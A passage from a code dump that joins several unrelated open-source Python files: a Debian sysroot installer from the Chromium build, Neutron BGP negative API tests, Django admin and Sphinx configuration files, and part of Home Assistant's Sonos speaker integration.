| jakubtuchol/HNTracker | src/__main__.py | Python | mit | 1,429 |
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Install Debian sysroots for building chromium.
"""
# The sysroot is needed to ensure that binaries will run on Debian Wheezy,
# the oldest supported linux distribution. For ARM64 linux, we have Debian
# Jessie sysroot as Jessie is the first version with ARM64 support. This script
# can be run manually but is more often run as part of gclient hooks. When run
# from hooks this script is a no-op on non-linux platforms.
# The sysroot image could be constructed from scratch based on the current
# state of Debian Wheezy/Jessie but for consistency we currently use a
# pre-built root image. The image will normally need to be rebuilt every time
# chrome's build dependencies are changed.
import hashlib
import json
import platform
import optparse
import os
import re
import shutil
import subprocess
import sys
import urllib2
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(os.path.dirname(SCRIPT_DIR)))
import detect_host_arch
URL_PREFIX = 'https://commondatastorage.googleapis.com'
URL_PATH = 'chrome-linux-sysroot/toolchain'
VALID_ARCHS = ('arm', 'arm64', 'i386', 'amd64', 'mips')
class Error(Exception):
pass
def GetSha1(filename):
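  """Return the SHA-1 hex digest of the file at filename."""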
sha1 = hashlib.sha1()
with open(filename, 'rb') as f:
while True:
# Read in 1mb chunks, so it doesn't all have to be loaded into memory.
chunk = f.read(1024 * 1024)
if not chunk:
break
sha1.update(chunk)
return sha1.hexdigest()
def DetectHostArch():
# Figure out host arch using build/detect_host_arch.py and
# set target_arch to host arch
detected_host_arch = detect_host_arch.HostArch()
if detected_host_arch == 'x64':
return 'amd64'
elif detected_host_arch == 'ia32':
return 'i386'
elif detected_host_arch == 'arm':
return 'arm'
elif detected_host_arch == 'arm64':
return 'arm64'
elif detected_host_arch == 'mips':
return 'mips'
elif detected_host_arch == 'ppc':
return 'ppc'
elif detected_host_arch == 's390':
return 's390'
raise Error('Unrecognized host arch: %s' % detected_host_arch)
def main(args):
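  """Parse command line options and install the sysroot for the requested arch."""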
parser = optparse.OptionParser(
'usage: %prog [OPTIONS]', description=__doc__)
parser.add_option(
'--arch',
type='choice',
choices=VALID_ARCHS,
help='Sysroot architecture: %s' % ', '.join(VALID_ARCHS))
options, _ = parser.parse_args(args)
if not sys.platform.startswith('linux'):
return 0
if not options.arch:
    print 'You must specify either --arch or --running-as-hook'
return 1
InstallDefaultSysrootForArch(options.arch)
return 0
def InstallDefaultSysrootForArch(target_arch):
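  """Install the Debian Jessie sysroot matching the given target architecture."""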
if target_arch == 'amd64':
InstallSysroot('Jessie', 'amd64')
elif target_arch == 'arm':
InstallSysroot('Jessie', 'arm')
elif target_arch == 'arm64':
InstallSysroot('Jessie', 'arm64')
elif target_arch == 'i386':
InstallSysroot('Jessie', 'i386')
elif target_arch == 'mips':
InstallSysroot('Jessie', 'mips')
else:
raise Error('Unknown architecture: %s' % target_arch)
def InstallSysroot(target_platform, target_arch):
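  """Download, verify and unpack the sysroot tarball for the given platform
  and architecture, skipping the work if the stamp file is already current.
  """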
# The sysroot directory should match the one specified in build/common.gypi.
# TODO(thestig) Consider putting this elsewhere to avoid having to recreate
# it on every build.
linux_dir = os.path.dirname(SCRIPT_DIR)
sysroots_file = os.path.join(SCRIPT_DIR, 'sysroots.json')
sysroots = json.load(open(sysroots_file))
sysroot_key = '%s_%s' % (target_platform.lower(), target_arch)
if sysroot_key not in sysroots:
raise Error('No sysroot for: %s %s' % (target_platform, target_arch))
sysroot_dict = sysroots[sysroot_key]
revision = sysroot_dict['Revision']
tarball_filename = sysroot_dict['Tarball']
tarball_sha1sum = sysroot_dict['Sha1Sum']
sysroot = os.path.join(linux_dir, sysroot_dict['SysrootDir'])
url = '%s/%s/%s/%s' % (URL_PREFIX, URL_PATH, revision, tarball_filename)
stamp = os.path.join(sysroot, '.stamp')
if os.path.exists(stamp):
with open(stamp) as s:
if s.read() == url:
return
print 'Installing Debian %s %s root image: %s' % \
(target_platform, target_arch, sysroot)
if os.path.isdir(sysroot):
shutil.rmtree(sysroot)
os.mkdir(sysroot)
tarball = os.path.join(sysroot, tarball_filename)
print 'Downloading %s' % url
sys.stdout.flush()
sys.stderr.flush()
for _ in range(3):
try:
response = urllib2.urlopen(url)
with open(tarball, "wb") as f:
f.write(response.read())
break
except:
pass
else:
raise Error('Failed to download %s' % url)
sha1sum = GetSha1(tarball)
if sha1sum != tarball_sha1sum:
    raise Error('Tarball sha1sum is wrong. '
'Expected %s, actual: %s' % (tarball_sha1sum, sha1sum))
subprocess.check_call(['tar', 'xf', tarball, '-C', sysroot])
os.remove(tarball)
with open(stamp, 'w') as s:
s.write(url)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except Error as e:
sys.stderr.write(str(e) + '\n')
sys.exit(1)
| dartino/dart-sdk | build/linux/sysroot_scripts/install-sysroot.py | Python | bsd-3-clause | 5,524 |
# Copyright 2016 Hewlett Packard Enterprise Development Company LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from tempest.lib import exceptions as lib_exc
from neutron.tests.api import test_bgp_speaker_extensions as test_base
from tempest import test
class BgpSpeakerTestJSONNegative(test_base.BgpSpeakerTestJSONBase):
"""Negative test cases asserting proper behavior of BGP API extension"""
@test.attr(type=['negative', 'smoke'])
@test.idempotent_id('75e9ee2f-6efd-4320-bff7-ae24741c8b06')
def test_create_bgp_speaker_illegal_local_asn(self):
self.assertRaises(lib_exc.BadRequest,
self.create_bgp_speaker,
local_as='65537')
@test.attr(type=['negative', 'smoke'])
@test.idempotent_id('6742ec2e-382a-4453-8791-13a19b47cd13')
def test_create_bgp_speaker_non_admin(self):
self.assertRaises(lib_exc.Forbidden,
self.client.create_bgp_speaker,
{'bgp_speaker': self.default_bgp_speaker_args})
@test.attr(type=['negative', 'smoke'])
@test.idempotent_id('33f7aaf0-9786-478b-b2d1-a51086a50eb4')
def test_create_bgp_peer_non_admin(self):
self.assertRaises(lib_exc.Forbidden,
self.client.create_bgp_peer,
{'bgp_peer': self.default_bgp_peer_args})
@test.attr(type=['negative', 'smoke'])
@test.idempotent_id('39435932-0266-4358-899b-0e9b1e53c3e9')
def test_update_bgp_speaker_local_asn(self):
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.assertRaises(lib_exc.BadRequest, self.update_bgp_speaker,
bgp_speaker_id, local_as='4321')
@test.idempotent_id('9cc33701-51e5-421f-a5d5-fd7b330e550f')
def test_get_advertised_routes_tenant_networks(self):
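        """Verify that only tenant subnets sharing the gateway network's
        address scope are advertised by the BGP speaker.
        """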
addr_scope1 = self.create_address_scope('my-scope1', ip_version=4)
addr_scope2 = self.create_address_scope('my-scope2', ip_version=4)
ext_net = self.create_shared_network(**{'router:external': True})
tenant_net1 = self.create_network()
tenant_net2 = self.create_network()
ext_subnetpool = self.create_subnetpool(
'test-pool-ext',
is_admin=True,
default_prefixlen=24,
address_scope_id=addr_scope1['id'],
prefixes=['8.0.0.0/8'])
tenant_subnetpool1 = self.create_subnetpool(
'tenant-test-pool',
default_prefixlen=25,
address_scope_id=addr_scope1['id'],
prefixes=['10.10.0.0/16'])
tenant_subnetpool2 = self.create_subnetpool(
'tenant-test-pool',
default_prefixlen=25,
address_scope_id=addr_scope2['id'],
prefixes=['11.10.0.0/16'])
self.create_subnet({'id': ext_net['id']},
cidr=netaddr.IPNetwork('8.0.0.0/24'),
ip_version=4,
client=self.admin_client,
subnetpool_id=ext_subnetpool['id'])
tenant_subnet1 = self.create_subnet(
{'id': tenant_net1['id']},
cidr=netaddr.IPNetwork('10.10.0.0/24'),
ip_version=4,
subnetpool_id=tenant_subnetpool1['id'])
tenant_subnet2 = self.create_subnet(
{'id': tenant_net2['id']},
cidr=netaddr.IPNetwork('11.10.0.0/24'),
ip_version=4,
subnetpool_id=tenant_subnetpool2['id'])
ext_gw_info = {'network_id': ext_net['id']}
router = self.admin_client.create_router(
'my-router',
distributed=False,
external_gateway_info=ext_gw_info)['router']
self.admin_routers.append(router)
self.admin_client.add_router_interface_with_subnet_id(
router['id'],
tenant_subnet1['id'])
self.admin_routerports.append({'router_id': router['id'],
'subnet_id': tenant_subnet1['id']})
self.admin_client.add_router_interface_with_subnet_id(
router['id'],
tenant_subnet2['id'])
self.admin_routerports.append({'router_id': router['id'],
'subnet_id': tenant_subnet2['id']})
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.admin_client.add_bgp_gateway_network(bgp_speaker_id,
ext_net['id'])
routes = self.admin_client.get_bgp_advertised_routes(bgp_speaker_id)
self.assertEqual(1, len(routes['advertised_routes']))
self.assertEqual(tenant_subnet1['cidr'],
routes['advertised_routes'][0]['destination'])
fixed_ip = router['external_gateway_info']['external_fixed_ips'][0]
self.assertEqual(fixed_ip['ip_address'],
routes['advertised_routes'][0]['next_hop'])
| wolverineav/neutron | neutron/tests/api/test_bgp_speaker_extensions_negative.py | Python | apache-2.0 | 6,469 |
from supertagging.modules import handlers
handlers.setup() | uclastudentmedia/django-supertagging | supertagging/__init__.py | Python | apache-2.0 | 59 |
from django import template
register = template.Library()
def submit_row(context):
"""
Displays the row of buttons for delete and save.
"""
opts = context['opts']
change = context['change']
is_popup = context['is_popup']
save_as = context['save_as']
return {
'onclick_attrib': (opts.get_ordered_objects() and change
and 'onclick="submitOrderForm();"' or ''),
'show_delete_link': (not is_popup and context['has_delete_permission']
and (change or context['show_delete'])),
'show_save_as_new': not is_popup and change and save_as,
'show_save_and_add_another': context['has_add_permission'] and
not is_popup and (not save_as or context['add']),
'show_save_and_continue': not is_popup and context['has_change_permission'],
'is_popup': is_popup,
'show_save': True,
}
submit_row = register.inclusion_tag('nexus/admin/submit_line.html', takes_context=True)(submit_row)
| jwmayfield/nexus-admin | nexus_admin/templatetags/nexus_admin.py | Python | apache-2.0 | 1,043 |
#
# django-filer documentation build configuration file, created by
# sphinx-quickstart on Tue Nov 16 22:05:55 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import datetime
import os
import sys
sys.path.append(os.path.abspath('../'))
from filer import __version__
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'django-filer'
copyright = '%s, Stefan Foulis' % (datetime.date.today().year,)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '.'.join(__version__.split('.')[0:2])
# The full version, including alpha/beta/rc tags.
release = __version__
for c in ('a', 'b', 'dev', 'r'):
if c in release:
tags.add('develop')
break
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-filerdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-filer.tex', 'django-filer Documentation',
'Stefan Foulis', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-filer', u'django-filer Documentation',
[u'Stefan Foulis'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| webu/django-filer | docs/conf.py | Python | bsd-3-clause | 7,456 |
"""Base class for common speaker tasks."""
from __future__ import annotations
import asyncio
from collections.abc import Callable, Coroutine
import contextlib
import datetime
from functools import partial
import logging
from typing import Any
import urllib.parse
import async_timeout
from soco.core import MUSIC_SRC_LINE_IN, MUSIC_SRC_RADIO, MUSIC_SRC_TV, SoCo
from soco.data_structures import DidlAudioBroadcast, DidlPlaylistContainer
from soco.events_base import Event as SonosEvent, SubscriptionBase
from soco.exceptions import SoCoException, SoCoSlaveException, SoCoUPnPException
from soco.music_library import MusicLibrary
from soco.plugins.sharelink import ShareLinkPlugin
from soco.snapshot import Snapshot
from homeassistant.components import zeroconf
from homeassistant.components.binary_sensor import DOMAIN as BINARY_SENSOR_DOMAIN
from homeassistant.components.media_player import DOMAIN as MP_DOMAIN
from homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN
from homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import entity_registry as ent_reg
from homeassistant.helpers.dispatcher import (
async_dispatcher_send,
dispatcher_connect,
dispatcher_send,
)
from homeassistant.util import dt as dt_util
from .alarms import SonosAlarms
from .const import (
BATTERY_SCAN_INTERVAL,
DATA_SONOS,
DOMAIN,
MDNS_SERVICE,
PLATFORMS,
SCAN_INTERVAL,
SEEN_EXPIRE_TIME,
SONOS_CREATE_ALARM,
SONOS_CREATE_BATTERY,
SONOS_CREATE_MEDIA_PLAYER,
SONOS_CREATE_SWITCHES,
SONOS_ENTITY_CREATED,
SONOS_POLL_UPDATE,
SONOS_REBOOTED,
SONOS_SEEN,
SONOS_SPEAKER_ADDED,
SONOS_STATE_PLAYING,
SONOS_STATE_TRANSITIONING,
SONOS_STATE_UPDATED,
SOURCE_LINEIN,
SOURCE_TV,
SUBSCRIPTION_TIMEOUT,
)
from .favorites import SonosFavorites
from .helpers import soco_error
EVENT_CHARGING = {
"CHARGING": True,
"NOT_CHARGING": False,
}
SUBSCRIPTION_SERVICES = [
"alarmClock",
"avTransport",
"contentDirectory",
"deviceProperties",
"renderingControl",
"zoneGroupTopology",
]
UNAVAILABLE_VALUES = {"", "NOT_IMPLEMENTED", None}
UNUSED_DEVICE_KEYS = ["SPID", "TargetRoomName"]
_LOGGER = logging.getLogger(__name__)
def fetch_battery_info_or_none(soco: SoCo) -> dict[str, Any] | None:
"""Fetch battery_info from the given SoCo object.
Returns None if the device doesn't support battery info
or if the device is offline.
"""
with contextlib.suppress(ConnectionError, TimeoutError, SoCoException):
return soco.get_battery_info()
def _timespan_secs(timespan: str | None) -> None | float:
"""Parse a time-span into number of seconds."""
if timespan in UNAVAILABLE_VALUES:
return None
assert timespan is not None
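    # e.g. "1:02:03" -> 1 * 3600 + 2 * 60 + 3 = 3723 seconds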
return sum(60 ** x[0] * int(x[1]) for x in enumerate(reversed(timespan.split(":"))))
class SonosMedia:
"""Representation of the current Sonos media."""
def __init__(self, soco: SoCo) -> None:
"""Initialize a SonosMedia."""
self.library = MusicLibrary(soco)
self.play_mode: str | None = None
self.playback_status: str | None = None
self.album_name: str | None = None
self.artist: str | None = None
self.channel: str | None = None
self.duration: float | None = None
self.image_url: str | None = None
self.queue_position: int | None = None
self.playlist_name: str | None = None
self.source_name: str | None = None
self.title: str | None = None
self.uri: str | None = None
self.position: float | None = None
self.position_updated_at: datetime.datetime | None = None
def clear(self) -> None:
"""Clear basic media info."""
self.album_name = None
self.artist = None
self.channel = None
self.duration = None
self.image_url = None
self.playlist_name = None
self.queue_position = None
self.source_name = None
self.title = None
self.uri = None
def clear_position(self) -> None:
"""Clear the position attributes."""
self.position = None
self.position_updated_at = None
class SonosSpeaker:
"""Representation of a Sonos speaker."""
def __init__(
self, hass: HomeAssistant, soco: SoCo, speaker_info: dict[str, Any]
) -> None:
"""Initialize a SonosSpeaker."""
self.hass = hass
self.soco = soco
self.household_id: str = soco.household_id
self.media = SonosMedia(soco)
self._share_link_plugin: ShareLinkPlugin | None = None
# Synchronization helpers
self._is_ready: bool = False
self._platforms_ready: set[str] = set()
# Subscriptions and events
self.subscriptions_failed: bool = False
self._subscriptions: list[SubscriptionBase] = []
self._resubscription_lock: asyncio.Lock | None = None
self._event_dispatchers: dict[str, Callable] = {}
# Scheduled callback handles
self._poll_timer: Callable | None = None
self._seen_timer: Callable | None = None
# Dispatcher handles
self._entity_creation_dispatcher: Callable | None = None
self._group_dispatcher: Callable | None = None
self._reboot_dispatcher: Callable | None = None
self._seen_dispatcher: Callable | None = None
# Device information
self.mac_address = speaker_info["mac_address"]
self.model_name = speaker_info["model_name"]
self.uid = speaker_info["uid"]
self.version = speaker_info["display_version"]
self.zone_name = speaker_info["zone_name"]
# Battery
self.battery_info: dict[str, Any] = {}
self._last_battery_event: datetime.datetime | None = None
self._battery_poll_timer: Callable | None = None
# Volume / Sound
self.volume: int | None = None
self.muted: bool | None = None
self.night_mode: bool | None = None
self.dialog_mode: bool | None = None
self.cross_fade: bool | None = None
self.bass_level: int | None = None
self.treble_level: int | None = None
# Misc features
self.buttons_enabled: bool | None = None
self.status_light: bool | None = None
# Grouping
self.coordinator: SonosSpeaker | None = None
self.sonos_group: list[SonosSpeaker] = [self]
self.sonos_group_entities: list[str] = []
self.soco_snapshot: Snapshot | None = None
self.snapshot_group: list[SonosSpeaker] | None = None
self._group_members_missing: set[str] = set()
def setup(self) -> None:
"""Run initial setup of the speaker."""
self.set_basic_info()
self._entity_creation_dispatcher = dispatcher_connect(
self.hass,
f"{SONOS_ENTITY_CREATED}-{self.soco.uid}",
self.async_handle_new_entity,
)
self._seen_dispatcher = dispatcher_connect(
self.hass, f"{SONOS_SEEN}-{self.soco.uid}", self.async_seen
)
self._reboot_dispatcher = dispatcher_connect(
self.hass, f"{SONOS_REBOOTED}-{self.soco.uid}", self.async_rebooted
)
self._group_dispatcher = dispatcher_connect(
self.hass,
SONOS_SPEAKER_ADDED,
self.update_group_for_uid,
)
if battery_info := fetch_battery_info_or_none(self.soco):
self.battery_info = battery_info
# Battery events can be infrequent, polling is still necessary
self._battery_poll_timer = self.hass.helpers.event.track_time_interval(
self.async_poll_battery, BATTERY_SCAN_INTERVAL
)
dispatcher_send(self.hass, SONOS_CREATE_BATTERY, self)
else:
self._platforms_ready.update({BINARY_SENSOR_DOMAIN, SENSOR_DOMAIN})
if new_alarms := [
alarm.alarm_id for alarm in self.alarms if alarm.zone.uid == self.soco.uid
]:
dispatcher_send(self.hass, SONOS_CREATE_ALARM, self, new_alarms)
else:
self._platforms_ready.add(SWITCH_DOMAIN)
dispatcher_send(self.hass, SONOS_CREATE_SWITCHES, self)
self._event_dispatchers = {
"AlarmClock": self.async_dispatch_alarms,
"AVTransport": self.async_dispatch_media_update,
"ContentDirectory": self.async_dispatch_favorites,
"DeviceProperties": self.async_dispatch_device_properties,
"RenderingControl": self.async_update_volume,
"ZoneGroupTopology": self.async_update_groups,
}
dispatcher_send(self.hass, SONOS_CREATE_MEDIA_PLAYER, self)
dispatcher_send(self.hass, SONOS_SPEAKER_ADDED, self.soco.uid)
#
# Entity management
#
async def async_handle_new_entity(self, entity_type: str) -> None:
"""Listen to new entities to trigger first subscription."""
if self._platforms_ready == PLATFORMS:
return
self._platforms_ready.add(entity_type)
if self._platforms_ready == PLATFORMS:
self._resubscription_lock = asyncio.Lock()
await self.async_subscribe()
self._is_ready = True
def write_entity_states(self) -> None:
"""Write states for associated SonosEntity instances."""
dispatcher_send(self.hass, f"{SONOS_STATE_UPDATED}-{self.soco.uid}")
@callback
def async_write_entity_states(self) -> None:
"""Write states for associated SonosEntity instances."""
async_dispatcher_send(self.hass, f"{SONOS_STATE_UPDATED}-{self.soco.uid}")
def set_basic_info(self) -> None:
"""Set basic information when speaker is reconnected."""
self.media.play_mode = self.soco.play_mode
self.update_volume()
#
# Properties
#
@property
def available(self) -> bool:
"""Return whether this speaker is available."""
return self._seen_timer is not None
@property
def alarms(self) -> SonosAlarms:
"""Return the SonosAlarms instance for this household."""
return self.hass.data[DATA_SONOS].alarms[self.household_id]
@property
def favorites(self) -> SonosFavorites:
"""Return the SonosFavorites instance for this household."""
return self.hass.data[DATA_SONOS].favorites[self.household_id]
@property
def is_coordinator(self) -> bool:
"""Return true if player is a coordinator."""
return self.coordinator is None
@property
def share_link(self) -> ShareLinkPlugin:
"""Cache the ShareLinkPlugin instance for this speaker."""
if not self._share_link_plugin:
self._share_link_plugin = ShareLinkPlugin(self.soco)
return self._share_link_plugin
@property
def subscription_address(self) -> str | None:
"""Return the current subscription callback address if any."""
if self._subscriptions:
addr, port = self._subscriptions[0].event_listener.address
return ":".join([addr, str(port)])
return None
#
# Subscription handling and event dispatchers
#
async def async_subscribe(self) -> bool:
"""Initiate event subscriptions."""
_LOGGER.debug("Creating subscriptions for %s", self.zone_name)
# Create a polling task in case subscriptions fail or callback events do not arrive
if not self._poll_timer:
self._poll_timer = self.hass.helpers.event.async_track_time_interval(
partial(
async_dispatcher_send,
self.hass,
f"{SONOS_POLL_UPDATE}-{self.soco.uid}",
),
SCAN_INTERVAL,
)
try:
await self.hass.async_add_executor_job(self.set_basic_info)
if self._subscriptions:
raise RuntimeError(
f"Attempted to attach subscriptions to player: {self.soco} "
f"when existing subscriptions exist: {self._subscriptions}"
)
subscriptions = [
self._subscribe(getattr(self.soco, service), self.async_dispatch_event)
for service in SUBSCRIPTION_SERVICES
]
await asyncio.gather(*subscriptions)
except SoCoException as ex:
_LOGGER.warning("Could not connect %s: %s", self.zone_name, ex)
return False
return True
async def _subscribe(
self, target: SubscriptionBase, sub_callback: Callable
) -> None:
"""Create a Sonos subscription."""
subscription = await target.subscribe(
auto_renew=True, requested_timeout=SUBSCRIPTION_TIMEOUT
)
subscription.callback = sub_callback
subscription.auto_renew_fail = self.async_renew_failed
self._subscriptions.append(subscription)
async def async_unsubscribe(self) -> None:
"""Cancel all subscriptions."""
_LOGGER.debug("Unsubscribing from events for %s", self.zone_name)
results = await asyncio.gather(
*(subscription.unsubscribe() for subscription in self._subscriptions),
return_exceptions=True,
)
for result in results:
if isinstance(result, Exception):
_LOGGER.debug("Unsubscribe failed for %s: %s", self.zone_name, result)
self._subscriptions = []
@callback
def async_renew_failed(self, exception: Exception) -> None:
"""Handle a failed subscription renewal."""
self.hass.async_create_task(self.async_resubscribe(exception))
async def async_resubscribe(self, exception: Exception) -> None:
"""Attempt to resubscribe when a renewal failure is detected."""
async with self._resubscription_lock:
if not self.available:
return
if getattr(exception, "status", None) == 412:
_LOGGER.warning(
"Subscriptions for %s failed, speaker may have lost power",
self.zone_name,
)
else:
_LOGGER.error(
"Subscription renewals for %s failed",
self.zone_name,
exc_info=exception,
)
await self.async_unseen()
@callback
def async_dispatch_event(self, event: SonosEvent) -> None:
"""Handle callback event and route as needed."""
if self._poll_timer:
_LOGGER.debug(
"Received event, cancelling poll timer for %s", self.zone_name
)
self._poll_timer()
self._poll_timer = None
dispatcher = self._event_dispatchers[event.service.service_type]
dispatcher(event)
@callback
def async_dispatch_alarms(self, event: SonosEvent) -> None:
"""Add the soco instance associated with the event to the callback."""
if not (event_id := event.variables.get("alarm_list_version")):
return
self.alarms.async_handle_event(event_id, self.soco)
@callback
def async_dispatch_device_properties(self, event: SonosEvent) -> None:
"""Update device properties from an event."""
self.hass.async_create_task(self.async_update_device_properties(event))
async def async_update_device_properties(self, event: SonosEvent) -> None:
"""Update device properties from an event."""
if more_info := event.variables.get("more_info"):
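            # more_info is a comma-separated list of "key:value" pairs,
            # e.g. "BattChg:NOT_CHARGING,BattPct:100,..."; the exact keys vary by model.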
battery_dict = dict(x.split(":") for x in more_info.split(","))
for unused in UNUSED_DEVICE_KEYS:
battery_dict.pop(unused, None)
if not battery_dict:
return
if "BattChg" not in battery_dict:
_LOGGER.debug(
"Unknown device properties update for %s (%s), please report an issue: '%s'",
self.zone_name,
self.model_name,
more_info,
)
return
await self.async_update_battery_info(battery_dict)
self.async_write_entity_states()
@callback
def async_dispatch_favorites(self, event: SonosEvent) -> None:
"""Add the soco instance associated with the event to the callback."""
if not (event_id := event.variables.get("favorites_update_id")):
return
if not (container_ids := event.variables.get("container_update_i_ds")):
return
self.favorites.async_handle_event(event_id, container_ids, self.soco)
@callback
def async_dispatch_media_update(self, event: SonosEvent) -> None:
"""Update information about currently playing media from an event."""
if crossfade := event.variables.get("current_crossfade_mode"):
self.cross_fade = bool(int(crossfade))
self.hass.async_add_executor_job(self.update_media, event)
@callback
def async_update_volume(self, event: SonosEvent) -> None:
"""Update information about currently volume settings."""
variables = event.variables
if "volume" in variables:
self.volume = int(variables["volume"]["Master"])
if "mute" in variables:
self.muted = variables["mute"]["Master"] == "1"
if "night_mode" in variables:
self.night_mode = variables["night_mode"] == "1"
if "dialog_level" in variables:
self.dialog_mode = variables["dialog_level"] == "1"
if "bass_level" in variables:
self.bass_level = variables["bass_level"]
if "treble_level" in variables:
self.treble_level = variables["treble_level"]
self.async_write_entity_states()
#
# Speaker availability methods
#
@callback
def _async_reset_seen_timer(self):
"""Reset the _seen_timer scheduler."""
if self._seen_timer:
self._seen_timer()
self._seen_timer = self.hass.helpers.event.async_call_later(
SEEN_EXPIRE_TIME.total_seconds(), self.async_unseen
)
async def async_seen(self, soco: SoCo | None = None) -> None:
"""Record that this speaker was seen right now."""
if soco is not None:
self.soco = soco
was_available = self.available
self._async_reset_seen_timer()
if was_available:
self.async_write_entity_states()
return
_LOGGER.debug(
"%s [%s] was not available, setting up",
self.zone_name,
self.soco.ip_address,
)
if self._is_ready and not self.subscriptions_failed:
done = await self.async_subscribe()
if not done:
await self.async_unseen()
self.async_write_entity_states()
async def async_unseen(
self, callback_timestamp: datetime.datetime | None = None
) -> None:
"""Make this player unavailable when it was not seen recently."""
data = self.hass.data[DATA_SONOS]
if (zcname := data.mdns_names.get(self.soco.uid)) and callback_timestamp:
# Called by a _seen_timer timeout, check mDNS one more time
# This should not be checked in an "active" unseen scenario
aiozeroconf = await zeroconf.async_get_async_instance(self.hass)
if await aiozeroconf.async_get_service_info(MDNS_SERVICE, zcname):
                # We can still see the speaker via zeroconf; check again later.
self._async_reset_seen_timer()
return
_LOGGER.debug(
"No activity and could not locate %s on the network. Marking unavailable",
zcname,
)
